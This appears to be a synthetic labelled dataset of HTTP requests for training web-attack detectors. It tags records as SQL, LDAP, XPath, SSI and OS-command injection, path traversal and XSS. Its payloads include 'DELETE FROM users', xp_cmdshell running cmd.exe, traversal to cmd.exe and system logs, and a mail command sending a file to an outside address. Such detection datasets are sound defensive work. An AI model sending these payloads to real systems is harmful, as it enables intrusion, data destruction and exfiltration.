Proxy-Authorization: Basic aG1hZWVwNzpZYXNvbzU3cg==
Authorization: NTLM d29nc2tzd2ZJbnlsZGNmY2l1dHQ3Z3FzYWdvNG9tZXNmb3RzVG5sdHpxN3Nlcg==
Range: -97604
Referer: http://tohr.org/aoTuhs/ttfeaa/uiuae/ordo.exe
TE: trailers,deflate,trailers
Trailer: Pragma
User-Agent: Mozilla/0.5 (Machintosh; U; PPC 0.7; Ao-m4; rv:6.1.5) Gecko/38396550
UA-CPU: x86
UA-Disp: 0683,5714,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 139x000
Via: HTTP/5.6 186.35.189.146, 4eg3/3.9 77.123.53.205:9864
Transfer-Encoding: gzip
Upgrade: eAeah/1.9, srlfi/6.1, 8t24e/5.5
Warning: 496 54.104.249.69 "iplf" "Fri, 06 May 05 07:10:25 GMT"
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 46513
Start - Id: 42233
class: SqlInjection
GET /.3linkaJCuU/wum42ayoTuhlehmim2iW/wh3r3z6cYcrmeta/WBa/l0a2TqD9arso.jpeg?Vr@L=%27%29+++++UNION++ALL+++++SELECT+oTyii++++FROM+++oqns9+++WHERE++%28%27%27%3D+++%27 HTTP/1.1
Host: 254.195.85.214
Connection: rEgaeet
Accept: video/*
Accept-Charset: euc-cn;q=0.8, iso-8859-3;q=0.2
Accept-Encoding: 
Accept-Language: se-Nn;q=0.4, miakwj-wa
Cache-Control: DnitN=ndsl
Client-ip: 25.90.218.25
Cookie: zhmXoioufhe=ounO=coaccept;qeasl=o;gsvaabsenhie6oE=r)pq 
Cookie2: $Version="306"
Date: Sat, 16 Jan 10 06:01:09 GMT
ETag: W/"tbUtlhiPLZRVIV-SX.zT"
Expect: 100-continue
From: vliMTora@eeed.de
If-Modified-Since: Wed, 17 Jan 07 10:38:58 CET
If-Unmodified-Since: Thu, 07 Jun 07 11:18:37 GMT
If-Match: *
If-None-Match: "UlE8z_q4FyB7iV_Zfc"
If-Range: Tue, 23 Mar 10 13:52:29 GMT
Max-Forwards: 576
MIME-Version: 1.3
Pragma: tlgh='7seaeit9'
Proxy-Authorization: NTLM M2FlbzFvd2R2amFoamFybnhjcWx1dXRkMXZhOXhMaXRtbmtzc2RPYXBl
Authorization: Ciye eo2eed9t=torumset
Range: 4539-14148,-19,934-
Referer: http://www.hsEce.com/tiyrthd/Kmwi5get/y1eehs/j1ibd/pstp0t4t.mspx
TE: chunked;q=0.5
Trailer: Proxy-Authorization
User-Agent: Mozilla/9.9 (Machintosh; U; Mac OS X 2.1; ab-6e; rv:9.2.7) Gecko/48608077
UA-CPU: x86
UA-Disp: 378,9839,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 451x3766
Via: FTP/1.2 www.empa2kpc.png
Transfer-Encoding: deflate
Upgrade: iunoNg/9.6
Warning: 805 www.oCYoru.jpg "crToo" "Wed, 13 Feb 08 17:50:20 GMT"
X-Forwarded-For: 3.212.183.96
X-Serial-Number: 8756384538065662
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42233
Start - Id: 42412
class: SqlInjection
GET /cVBEj8yRM7I2O19/eIzAqvkpu8rTnZTyx/aenzeonbejY/waPriies8dmhrcom/sde7yee/copyBr/o3Ym8yH--m5/g@jW/au6szhc/rCotNEw74uetaeevtlt/IP9@/m0ZKRHVXXXQszlWXmtWy.asmx?GQstdinE7nhTDs=31540567&o7hyab4y8r2gsc=%27++++OR++++%27lionpiffu%27+++%3E+++%27S HTTP/1.1
Host: www.nnChqtq.st:24
Connection: close
Accept: */*;q=0.4
Accept-Charset: iso-8859-8-i, windows-1258;q=0.5, iso-8859-4;q=0.4, iso-2022-jp
Accept-Encoding: *;q=0.6
Accept-Language: 8yzsp-tkaa, ta0ut2re-T;q=0.8, dv-uhA, 6l4oreit-te
Cache-Control: only-if-cached
Client-ip: 179.176.205.80
Cookie: erong47mhdareol=rhttMvtg5rPdwvltbd;e1AorkPuisa=895581;sonrnlodHse=iklmail7ifromt;-Ny5GdZsm=ioi7Ost;88=sTvoer
Cookie2: $Version="0"
Date: Sun, 01 Jun 08 20:39:07 CET
ETag: W/"Rpx8n9plGZ_Oq3Rf4"
Expect: 100-continue
From: Tm9x@je4xi.it
If-Modified-Since: Thu, 01 Apr 04 14:45:31 CET
If-Unmodified-Since: Wed, 08 Jul 09 20:50:34 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 18
MIME-Version: 2.5
Pragma: ni=ofsrha
Proxy-Authorization: Basic YWV0ZWJwdzplbHdOZm1lcg==
Authorization: NTLM V2hvOXR0dG5uRmF3ZEVhbzllbTF0c1VrZXZpaGk2bklaOGVYVWl3ZW9jZlBk
Range: -975727,63980-89,80-3
Referer: http://nteI.it/Otz6yet/zudasmat/ldsTh/yt4nrna5.mdb
TE: trailers,deflate;q=0.3
Trailer: Host
User-Agent: Mozilla/0.8 (compatible; Konqueror/1.5; Linux i386; iiti)
UA-CPU: StrongARM
UA-Disp: 156,101,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 189x646
Via: 5.6 www.b2o1.htm, FTP/5.6 www.3ej7.html
Transfer-Encoding: compress
Upgrade: 3w4vo/5.2, oee9/2.0, ot6Q/5.5, ergojg/6.9, u2osoe/4.9
Warning: 959 43.75.81.219 "tnToErltptitB2kmlm3" "Tue, 25 Dec 07 06:56:35 GMT"
X-Forwarded-For: 120.46.59.231
X-Serial-Number: 2317427
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42412
Start - Id: 35303
class: SqlInjection
GET /pNi4C-VHEx_BH6j5/FPttHWKHQDd/gq/lEf5T0gv65jiiTTESJ/3oetahsHeSn5eaai/ss51nttt1taoPjrEbsSs/lNqpe3hoiwt/aeq1tTntttewn.jsp?uG0varupdate1zp=fzulp&e3svaevjqx=pJIiKuxksL3s&rhtahmrsg=%5B%26L&sse=709&flg1Azgdopr3aas=rt1%28&eI2o=25&1-allUUtu9=863&crdliheiygptid=0aunere8e%27+++%29%3BDELETEFROMusersWHEREupper%28username%29%3D+upper%28++%27admin&YUrukli8wBq=cwi&DmnaeEe5=78 HTTP/1.1
Host: www.nReaeOsnfc.fr
Connection: close
Accept: application/rtf, application/zip, image/gif;q=0.0
Accept-Charset: gb2312, windows-1257, utf-8
Accept-Encoding: compress;q=0.0
Accept-Language: 4tig0i-eU;q=0.4, d9utui-siaA, 5Ipa767-t, Is-S;q=0.8, ctacstlb-b
Cache-Control: no-transform
Client-ip: 213.3.132.26
Cookie: nvqstnTol=eaktxeitxy;5ihtaccesDdZDRwE=tth+f eqMunionpeeoa$Hn e;nFebvets=6DA_bKn
Cookie2: $Version="1"
Date: Tue, 06 Jul 04 07:43:18 GMT
ETag: "-DIqNN_AVJHh1rNgpl"
Expect: 100-continue
From: nhtud3@oxbjd.com
If-Modified-Since: Sat, 22 Nov 08 09:16:55 GMT
If-Unmodified-Since: Thu, 30 Oct 08 09:01:15 UTC
If-Match: *
If-None-Match: *
If-Range: "9Me-gDD9gfiCN5PioDce"
Max-Forwards: 42
MIME-Version: 3.3
Pragma: sBftho='Hl'
Proxy-Authorization: Basic bGVhY29vZjp0Z2xucmlv
Authorization: Basic Y2Nibm5vYmk6ZWJuY28z
Range: -6,470-,89626-1
Referer: /ylwihhe/yctrs/i2atas.pl
TE: trailers,trailers
Trailer: Range
User-Agent: Mozilla/5.1 (X11; U; Open BSD i386 7.3; ch-te; rv:7.9.8) Gecko/61208586
UA-CPU: 68000
UA-Disp: 420,4746,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 048x605
Via: 5.8 18.115.79.44
Transfer-Encoding: compress
Upgrade: dn44o/1.3
Warning: 253 218.149.32.49:09543 "ossewsejptoiefrraaR" 
X-Forwarded-For: 111.116.93.90
X-Serial-Number: 75933173899999851
----: --------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 35303
Start - Id: 36739
class: OsCommanding
GET /Ift5WoasNXcfu/wnKjCUKGUJUQKo5Z/ttLKx1PO/hhNuttennne/wwnewth2RoemSden/etw6uihebnnSexmatsst/14iLo6ezeifanx0Rdoe/Esezev/lQtHY6WWAL7/eewhshiuv2tageH/tS@YudD2/rupdate4E3WDpwHmochaQ6.nsf?sqwidmAnsel=854043&6aopv7=mail++Rohaaodi8u%40atp.iemuv.gov+++%3C%3C++%2Ftmp%2Fwu.c+++%3B HTTP/1.0
Host: www.fhgteNu.de:7
Connection: kherayen
Accept: image/*, video/*;q=0.3
Accept-Charset: macintosh;q=0.7
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 71.77.69.175
Cookie: 6n9t=mae;sdelje=5173;iEoeN=e6vedXwm6_;n03Ppnmpryfsyo=278
Cookie2: $Version="0"
Date: Sun, 25 May 08 22:07:53 GMT
ETag: W/"KQH1Ph8SYsJZUWFBCG"
Expect: 100-continue
From: 9rrtotci@rtshul.org
If-Modified-Since: Fri, 31 Oct 08 19:34:17 GMT
If-Unmodified-Since: Sun, 01 Feb 09 16:12:57 GMT
If-Match: "Bzp4oCgH-jAMrEt"
If-None-Match: *
If-Range: Tue, 11 Oct 05 05:17:18 GMT
Max-Forwards: 0
MIME-Version: 3.9
Pragma: ipi='n8a1Z'
Proxy-Authorization: Digest algorithm=Rrf1lpt
Authorization: Digest response="6eAEeC1c77C470AcDca6aE6CaA0D1D4f"
Range: -47510,582-0
Referer: http://www.xgthtps.biz/eaStedRa/ar3qohtn/kctdaSep.mpeg
TE: trailers,trailers,deflate
Trailer: From
User-Agent: Mozilla/2.8 (Machintosh; U; PPC 8.4; oe-jd; rv:3.3.0) Gecko/04597455
UA-CPU: Sparc
UA-Disp: 8267,5613,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 402x4966
Via: uwoe/8.8 227.139.112.151
Transfer-Encoding: compress
Upgrade: evenU/1.9, Quheec/0.8, sieT/8.6, e9Rslt/7.3, iZner/9.0
Warning: 867 151.26.59.212 "etraSdoEtTi83ctsms0" 
X-Forwarded-For: 246.253.133.9
X-Serial-Number: 5966336
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36739
Start - Id: 37880
class: LdapInjection
GET /aK/btreSelghe11y/t1JOtx53mxYbV/or3toEresoiqtuNr/tdbomloieaf6Mrw.gif?mqhC=837%29%28%26%28objectClass%3DirA%29%28%7C%28sn+++%3D+++vFi%29%28cn%3DIbfj++++J*%29%29 HTTP/1.1
Host: www.aizse9e.org:80
Connection: keep-alive
Accept: application/zip, text/*;q=0.4, application/zip;q=0.2
Accept-Charset: x-mac-korean, windows-874;q=0.1, windows-1251, ks_c_5601-1987, x-mac-hebrew;q=0.8
Accept-Encoding: *
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 111.218.205.150
Cookie: jTe2aw=dFLCZVZ3-
Cookie2: $Version="4"
Date: Fri, 07 Apr 06 11:18:21 UTC
ETag: W/"cTuTMBUKrytYEa.@"
Expect: ooauyOdi
From: ftCe@ttlwnsel.it
If-Modified-Since: Wed, 14 Apr 10 14:30:35 CET
If-Unmodified-Since: Wed, 21 Feb 07 06:54:15 GMT
If-Match: "JwGYAFjSnIbrcn2i7"
If-None-Match: "M9sH0o2P18l28ICX"
If-Range: Sun, 24 Jan 10 11:52:54 GMT
Max-Forwards: 0727
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: Basic ZXNtaGFTOmF4dWVl
Authorization: Basic dG5vZnF0OmllZWc=
Range: 41-534098,-55
Referer: /renpt/6teeot.css
TE: chunked;q=0.4
Trailer: If-Modified-Since
User-Agent: Mozilla/1.2 (Machintosh; U; PPC Mac OS X 0.7; in-8r; rv:8.6.2) Gecko/35735866
UA-CPU: Sparc
UA-Disp: 322,606,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 649x451
Via: 7.6 146.14.202.143, FTP/5.8 www.tEsa.jpg, FTP/3.1 www.mudpfo.jpg
Transfer-Encoding: compress
Upgrade: 82r/8.3, ehi/8.7
Warning: 941 www.iehcba.gif:913 "elrrSd" 
X-Forwarded-For: 32.94.96.206
X-Serial-Number: 300384
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37880
Start - Id: 36376
class: PathTransversal
PUT /xp9opswfRrt/nidIrk3onnssegednbs/z4xscw/hVSW.mOtwFtnhU_wcR/iisiaebkntefince6/nZmAWv6MagLolpiK/0hlg2ojmieustsnbksiy/t-OP/oj4ZEg/oIsSH/06R/Iermiuou8e2x.jsp? HTTP/1.0
Content-Length: 145
Content-Language: 4tdii,qSnrsrya
Content-Encoding: identity
Content-MD5: ZnMzdG9vdGlhY3JpdHp5dA==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Wed, 25 Feb 09 05:40:35 UTC
Host: 115.3.22.241
Connection: close
Accept: video/*, image/*;q=0.7
Accept-Charset: iso-2022-kr
Accept-Encoding: *;q=0.9
Accept-Language: *;q=0.4
Cache-Control: max-stale
Client-ip: 62.10.54.23
Cookie: iteesagrelds3e=../../../../var/log/access_log%00.html;05oiuiq=tgs
Date: Sun, 26 Jul 09 02:56:46 CET
ETag: "dFqmlzWsfX755q3CJ"
If-Match: "5yUnq0U3BCMafm9"
MIME-Version: 5.0
Proxy-Authorization: nsr7te st6s=sqocjhyd
Authorization: Basic dmU4Mjp1aWVlZEVoWQ==
Referer: http://zim5Sk.it/at0dinka/tzenlo.doc
TE: trailers
User-Agent: tent5dS/5.2.9
UA-Disp: 884,0581,32
UA-Pixels: 207x8219
Via: 5.6 www.wAcev.js, 6.0 200.103.16.215:97854
~~~~~: ~~~~~~~~~~~~~~~~~~~~

yBvbscriptI=0&ohueeEwlte=7php&sltsuojd=site9cerTq&pyeEih=mEKaWGv&doeeu3qddfeys=5QOle&kze=EA3Ihomes\o nphpput&eedoo=099045560&aaia=grs1xerdnta6m

End - Id: 36376
Start - Id: 44412
class: OsCommanding
GET /PBServer/..��../..��../..��../winnt/system32/cmd.exe?/c+dir+c:0 HTTP/1.0
Host: www.iea7sa.biz
Connection: keep-alive
Accept: video/quicktime;q=0.3
Accept-Charset: iso-8859-2;q=0.2
Accept-Encoding: *;q=0.9
Accept-Language: HSdofoE-scoeumeq, on-Niedm;q=0.6
Cache-Control: bta9m=nx
Client-ip: 139.10.43.8
Cookie: ssbmna=5
Cookie2: $Version="45"
Date: Wed, 13 Apr 05 14:07:20 CET
ETag: W/"V.NIwSOWHFxujXg-iF_9"
Expect: qeSl8a=erci;preie
From: on76@weg6se.uk
If-Modified-Since: Mon, 05 Jun 06 02:15:41 UTC
If-Unmodified-Since: Sat, 27 May 06 04:28:22 CET
If-Match: "2uzo5FNbXbBlmlGRD"
If-None-Match: "ByrT.aijP_C5xvp67"
If-Range: Sat, 26 Mar 05 19:05:28 UTC
Max-Forwards: 60
MIME-Version: 6.5
Pragma: Rbrb7ct=Aomle7
Proxy-Authorization: NTLM NmU3cGFleWw5QWhnbmUxYWN0cGFzRVlocnpuZHVuZW5FaWx0VWs=
Authorization: oigi5 uil1eat=nanstcl
Range: 277921-3,-74088
Referer: http://www.roeedfiE.it/etXhaj/fhsaieaa/eoGwte/amem5i/4phten8.sh
TE: gzip
Trailer: Warning
User-Agent: Mozilla/2.6 (Machintosh; U; PPC Mac OS X 3.1; 6a-ot; rv:4.6.7) Gecko/47683724
UA-CPU: Sparc
UA-Disp: 321,8339,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 6396x837
Via: ljf/1.1 85.131.140.65, HTTP/6.1 www.8oro.gif
Transfer-Encoding: gzip
Upgrade: asneah/1.8, akhg/1.6
Warning: 979 78.14.185.203:6018 "tTaatehewrtmsw1blocn" "Fri, 25 Jan 08 13:54:58 GMT"
X-Forwarded-For: 80.244.159.109
X-Serial-Number: 16197588346334119700
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44412
Start - Id: 47181
class: XSS
GET /onxAs.shtml?e7ycgusml=iz&pfhewwheeyd=ic&wsi=do&ed73hooiiH=17085&s9IsmesR=dnraer&ovhytDesreoaerk=iokLthc&stgtvdl41Aib3ae=atGe&RnrNtm=%3Cscript++%3Ealert%28++++%22+++++soct3tjeaLOpUN.1crei7%22%29%3C%2Fscript++%3E&sreyeaDen=i6Rcns5oiuf HTTP/1.1
Host: www.ee4omii.com:80
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: compress;q=0.4, gzip, gzip;q=0.9, gzip
Accept-Language: torn-nn, b-eOMgkta3
Cache-Control: max-age=7
Client-ip: 21.251.227.103
Cookie: ncd2S=047915;oaf=sxbn 
Cookie2: $Version="93"
Date: Thu, 05 Mar 09 19:07:25 UTC
ETag: W/"sx302XohAygbTfJiaE"
Expect: 100-continue
From: atrc@mosrloac8i.net
If-Modified-Since: Fri, 28 Oct 05 18:22:55 GMT
If-Unmodified-Since: Sat, 09 Dec 06 11:53:44 CET
If-Match: "@leWTd7Sl0cGoL00g"
If-None-Match: "7w1NhNht1D-_UeimI56I"
If-Range: Sat, 02 Dec 06 01:40:03 UTC
Max-Forwards: 691
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: NTLM c1N0ZmdnbEhBT1RzZXhwZXBkdXQwdGJkbGV3ZW5lcjNyOQ==
Authorization: 4tyrit amehle5=8eattttG
Range: 23320-
Referer: http://uuon.biz/nstTq/zctRe/oaeFoe/b1ot8/niceeBhh.msf
TE: deflate;q=0.8
Trailer: Transfer-Encoding
User-Agent: rU03GW http://www.mtH4.ch
UA-CPU: MIPS
UA-Disp: 934,693,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 6020x621
Via: HTTP/9.1 27.36.191.16
Transfer-Encoding: compress
Upgrade: 7hadcl/7.9, 8tJSt/5.4, qlttea/4.8
Warning: 683 181.248.214.19 "qlt9unMovxwdh" "Tue, 18 Jan 05 01:02:04 UTC"
X-Forwarded-For: 85.51.180.168
X-Serial-Number: 533969856895
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47181
Start - Id: 41027
class: SqlInjection
GET /naN0yr.from8Va.nsf?mnitetp=0665&pztsc1senFg80c=96011&naeghapo=eeiitte1pTnwetwole&alhm=lrXHfGH-P&ah1esdo=a%7Cni+selectiA%27S4jheVoct&em=%27%3BEXECmaster.dbo.xp_cmdshell%27cmd.exe&nagfaybejzshi=tmph+ylmq&6kZ-@E1i=006 HTTP/1.0
Host: www.eae8oa.net
Connection: close
Accept: video/mpeg, audio/x-wav, text/plain
Accept-Charset: *;q=0.6
Accept-Encoding: identity;q=0.5, identity
Accept-Language: *
Cache-Control: min-fresh=26862
Client-ip: 2.230.114.150
Cookie: rrplike@passwdjY=2Qdnmj.;jtls=hi1;rsiMiR6itAAhts=(eliftp;eeAinz=133019;ui6welinr=nXfBz-e-;nMidmiuQ50e=ynldcuxinirSxtdB
Cookie2: $Version="66"
Date: Sat, 11 Jun 05 13:17:18 UTC
ETag: W/"e8h6IKFwFygF.9A6w624"
Expect: yuEtt
From: spbhn@ispeCheey.net
If-Modified-Since: Tue, 17 Feb 09 14:47:11 CET
If-Unmodified-Since: Tue, 23 Nov 04 05:32:03 CET
If-Match: "Kxj6uw5Kr6S9-7IVfd"
If-None-Match: "PyyV5C-IJ@TPZ1fTpZS3"
If-Range: "sH_uqNUxLh_eR52wUKe"
Max-Forwards: 5
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: dEwdh oSgoauto=ctAcmei
Authorization: anT3a ilhi=u9Lqo
Range: 770-,-93926
Referer: /Orln.php3
TE: trailers,trailers,gzip;q=0.9
User-Agent: qxubtyihh (tVSSsTh3)
UA-Disp: 3796,7783,32
UA-Color: color16
UA-Pixels: 6152x736
Via: dlbsd/2.7 45.187.138.214
Transfer-Encoding: compress
Upgrade: ueiDt/4.5, Y8a3e/0.2, set/3.6, emlvo/5.7
Warning: 484 www.41xtiu.shtml "ffgplwga7ia3nttt" "Sun, 25 Apr 10 04:50:48 UTC"
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41027
Start - Id: 35562
class: XPathInjection
PUT /7HKkY/pmWHHN3V22/agtcdpn/hngehda/1G/qepieunobt/hAj5MN/sOPNPspFvvJXaB/SuAQnetcat33.XRkn.php4? HTTP/1.1
Content-Length: 202
Content-Language: fenSoni
Content-Encoding: deflate
Content-Location: http://Hrihyej.be/ihhhun/si2ewl.pdf
Content-MD5: dWRpUm5jZ2g4bHNlNW9ubw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 16 Sep 09 19:00:17 GMT
Last-Modified: Sat, 05 Apr 08 08:10:47 GMT
Host: 9.154.113.254
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: windows-1250;q=0.7, x-mac-arabic;q=0.9, isiri-3342;q=0.3, utf-8
Accept-Encoding: *
Accept-Language: aaaraps-eida;q=0.3, cuW-aez5ee
Cache-Control: min-fresh=02
Client-ip: 91.74.181.149
Cookie: NRf2exec9=64243;roenFtjogaaieR=9nsoesa5nayme5lo;sa9otdec=ltndekf3hpasswdvar10drehomed
Cookie2: $Version="43"
Date: Thu, 02 Aug 07 13:43:37 GMT
ETag: "v_dCT6QcvMRM03vgD95"
Expect: 100-continue
From: wp5sjfh@o8nst.uk
If-Modified-Since: Sun, 11 Jun 06 06:41:01 CET
If-Unmodified-Since: Thu, 07 Jul 05 17:28:22 CET
If-Match: *
If-None-Match: ".HeVhjOUKFBDRA6-"
If-Range: "uf7azlJ_kVfg3dgG87"
Max-Forwards: 5
MIME-Version: 5.3
Pragma: ghnAvt9=dren9
Proxy-Authorization: len2te ytHaNuew=yalote
Authorization: n2ni t7rOda=rkoT
Range: -1,-1839
Referer: http://hz8ne.net/o3cd3e/aeIbjws/3ohgitu/mrnhSNbn.mpg
TE: deflate;q=0.5,trailers,trailers
Trailer: Pragma
User-Agent: Mozilla/8.6 (X11; U; SunOS sun4u 3.3; 3r-ee; rv:1.1.5) Gecko/00238148
UA-CPU: 68000
UA-Disp: 0509,6144,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 174x8533
Via: 6.0 www.zDnedde.htm
Transfer-Encoding: compress
Upgrade: ihret/7.1, korlrr/8.1, oqs1/4.8, miil/4.8, mtdoz/9.8
Warning: 111 66.147.23.225 "Ce1Nw" "Thu, 19 Mar 09 19:56:10 UTC"
X-Forwarded-For: 219.76.123.80
X-Serial-Number: 42337082181389056
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

nrgrdh=04622&oejgotnp=Bubeo&ftAN5SC_e=yFFr7Mtx&tsyanwIqte=W\&3oh=tto'   or  n/ob/child::node()[processing-instruction()=9]  or   'en32S' =    '&FpeaLni=bFjovkMW&euu=933

End - Id: 35562
Start - Id: 37632
class: LdapInjection
POST /pM7sBLSLNIh-Q06/st9hj2av9x8ijinIn/9cCz1iWi6z/g40@uZYoR/isuostit9Zeaetm8/htnyPt1EsefNohi/q-zUr/i6qip3@el4/C8/vbscriptfromH53n3X_/0aALb.css? HTTP/1.1
Content-Length: 98
Content-Language: snev5u,pans,yemegr
Content-Encoding: deflate
Content-Location: http://3OhhaO.net/eapr11/Aheney3/ou23o8/ewupcjfs/H9hbt.jsp
Content-MD5: c2xpbXNvcjBoYmVlU3N6RA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 10 Jul 07 17:29:40 CET
Last-Modified: Tue, 27 Jul 04 09:11:38 GMT
Host: 5.118.152.110:80
Connection: haqmnsmT
Accept: */*
Accept-Charset: iso-2022-kr, iso-8859-6, utf-8;q=0.7, euc-jp;q=0.0
Accept-Encoding: gzip;q=0.9, compress, compress, gzip;q=0.9, compress;q=0.9
Accept-Language: *;q=0.0
Cache-Control: max-age=92
Client-ip: 48.79.161.71
Cookie: unionmochaIdMJU0position=+ipsoew>0t2ecAr;ebrofte25atv=9OaI
Cookie2: $Version="477"
Date: Fri, 11 Jan 08 13:50:41 GMT
ETag: "UasEgXZAUoa8Yhw8"
Expect: 100-continue
From: yhSsf@ahrg7dbN.com
If-Modified-Since: Sat, 29 Sep 07 24:03:23 CET
If-Unmodified-Since: Tue, 26 May 09 04:17:29 CET
If-Match: "bhbbKh8reMkrOEpvhI3q"
If-None-Match: "KAGCoMejRUD21ppF"
If-Range: *
Max-Forwards: 6773
MIME-Version: 8.8
Pragma: no-cache
Proxy-Authorization: Basic aXJ0d2E6cmVtaA==
Authorization: Basic QWFvZzptUmFwZGk=
Range: 5-39626,617734-853345
Referer: http://www.dmrhkhs.org/tOnpc1b/teusrG/Tabv5A.gz
TE: trailers,chunked;q=0.0
Trailer: If-Modified-Since
User-Agent: Mozilla/2.9 (compatible; Konqueror/6.3; SunOS sun4u; mreCiml; a4dn0n; ipon52T)
UA-CPU: MIPS
UA-Disp: 8272,2255,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 4356x362
Via: HTTP/1.3 www.fnbnled.js, 3.7 247.245.41.81
Transfer-Encoding: gzip
Upgrade: 1obltA/1.6, begaf/4.9, aje/5.5
Warning: 290 www.csV7.jpg "alupzEldm3wn" 
X-Forwarded-For: 20.191.23.124
X-Serial-Number: 011740300898
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

sh=0&ihedeaswnflr2=)  (    |(Thty=wana*)&sDceen5etkelo=3Bsl &.lUQ=inxmlu&do=Elositde64

End - Id: 37632
Start - Id: 40878
class: SSI
GET /olrUlANdngh/u.IEUmDKpBZvdh6q_/@g24catp1e--z/nVkkQTV_-rIRv/nfFrnSJUv/RG3BWBlc.usrrcpOGq7/istqeanaOq6ny17hm/hqTidu/meizwf2dteh/m6P1_br/ezU@vrNzNMTYowBS2t5.gif?deo4k7ee9nteEys=%3C%21--++++%23odbc++++statement+++%3D++%22select+++se%2C+++++seQ%2C++++o3itbs++++from+++++t6si+order+by+4%2C++789%2C+++0%22+--%3E&winntaI7rAehomeq=ghhX.nS&ecme=mochahvart%3Fslocationhhavingfit%28td&IenO=hldc&80Xwi=86728851&redaesazs=45656354&Y2ozihe=%40dtDreplaceasock_streamorra5n+&opt51EXP2S6=hrtRhsh9j&risyg=ewbsunr%7E&ttalcesiopK=43&Q70Il.2x3L6=o8i&esdety8dpqen=r%3Fdhx%3D%25 HTTP/1.1
Host: 36.227.199.248:96723
Connection: close
Accept: */*
Accept-Charset: koi8, iso-8859-8-i, x-mac-cyrillic;q=0.6
Accept-Encoding: gzip;q=0.2, deflate, identity;q=0.5
Accept-Language: *
Cache-Control: min-fresh=6084
Client-ip: 158.44.31.77
Cookie: homeiNimg_rcp-_=lnsedmf1Eunrs;WG-JGFA=asock_streamn;Telboaer=eRVm5byi;te88nikrctc2tiH=79;sa4mj3=urlo;oElop4v=rxZX0oyvDF
Cookie2: $Version="63"
Date: Thu, 15 Apr 10 16:47:18 UTC
ETag: "nd2zE-jKRmzyRPpZ@xss"
Expect: 1ftgarh=esSyfe
From: xhslhnd@1eneubz.it
If-Modified-Since: Thu, 30 Mar 06 07:14:31 UTC
If-Unmodified-Since: Sat, 05 Feb 05 12:40:12 UTC
If-Match: *
If-None-Match: "n6mKw8sPhDR3ZXi"
If-Range: *
Max-Forwards: 619
MIME-Version: 8.5
Pragma: no-cache
Proxy-Authorization: Basic dHQybmlKOmVtc3dzckFy
Authorization: NTLM NGJvb3RUZVVjZ3R0c05tcmVzY29zNmI3a2xpUnBvcjVubGh4c2Z4
Range: 1-,-16972,856295-5
Referer: http://www.eatDmst.biz/oy0qbna/narGt6/4ltrbkAn/n8ehtA.php4
TE: chunked,trailers
Trailer: Upgrade
User-Agent: Mozilla/5.2 (Machintosh; U; Mac OS X 0.0; ee-oo; rv:4.3.5) Gecko/19309799
UA-CPU: x86
UA-Disp: 998,969,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 5993x410
Via: FTP/3.5 212.113.104.246, 2.0 www.anteetit.css, 7.6 34.169.57.124
Transfer-Encoding: pmtESr
Upgrade: i72f/4.9, Zi2a/5.6, sifx9/9.1
Warning: 063 170.129.30.215:3080 "tttenlbdte1UerRsne1h" 
X-Forwarded-For: 38.3.235.137
X-Serial-Number: 64687084042208
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 40878
Start - Id: 38687
class: LdapInjection
GET /eOcFqrUStRqAyLc8YDWL/naenw9pmsoeaijhnewQo/n0LXzlSeiPDWdNl_@jfv/lH2T6PukYW9Z/7U/window.opentcGYimgkt_1hNoD4/ftp@_3E/j8nRa/ux3Wavuanuienfte1/esdroxoeteaoplIsome.cgi?trrliEuxrts=uqcezcecje2apoeOT&ig=24&nnbUdt=%29++%28%7C+%28displayName%3Dhad*%29++%28name++%3D++++had*++++%29%28mail%3Dhad*+%29 HTTP/1.0
Host: 93.53.191.236
Connection: Hnewrig
Accept: */*
Accept-Charset: ks_c_5601-1987, iso-8859-15, utf-8;q=0.3, x-mac-icelandic
Accept-Encoding: 
Accept-Language: 6iese-lqge7;q=0.8
Cache-Control: no-cache
Client-ip: 19.47.61.99
Cookie: 8sa2oaaasT9xcwi=htpofec8nc(dsjl|io;m4nScsoe9lddnRw=50
Cookie2: $Version="63"
Date: Tue, 10 Nov 09 01:11:10 GMT
ETag: "EvxKQQHQRlpZyyner"
Expect: Nh7w=4aegcen;feoka
